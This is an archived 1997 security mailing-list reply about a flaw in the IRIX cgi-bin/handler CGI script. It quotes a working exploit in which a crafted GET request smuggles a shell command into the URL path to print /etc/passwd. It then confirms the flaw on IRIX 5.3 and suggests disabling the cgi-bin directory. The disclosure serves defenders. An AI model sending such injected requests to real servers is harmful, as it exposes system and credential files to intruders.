![]() |
![]() |
![]() |
Latest Vulnerabilities |
![]() |
||||||
![]() |
||||||||
![]() |
||||||||
![]() |
||||||||
|
This HTML page has been automatically generated from a mail message and therefore the formatting may have changed, particularly with code fragments.
Below is the original message:
On Sun, 15 Jun 1997, Razvan Dragomirescu wrote:
:The way to exploit this "feature" for cgi-bin/handler is:
:telnet target.machine.com 80
:GET /cgi-bin/handler/useless_shit;cat /etc/passwd|?data=Download
:HTTP/1.0
:I tested it on two Indy machines with IRIX 6.2. I would appreciate any
:feedback from you.
It worked on my IRIX 5.3 machines.
my fix: chmod 0 /var/www/cgi-bin
Yaron.
\\\|///
\\ - - //
( @ @ )
+-----------------------oOOo-(_)-oOOo-------------+
| Yaron Yanay. email:yarony@yarony.il.eu.org |
| yarony@tx.technion.ac.il |
| http://www.technion.ac.il/~yarony |
| http://yarony.il.eu.org |
+-------------------------------Oooo--------------+
oooO ( )
( ) ) /
\ ( (_/
\_)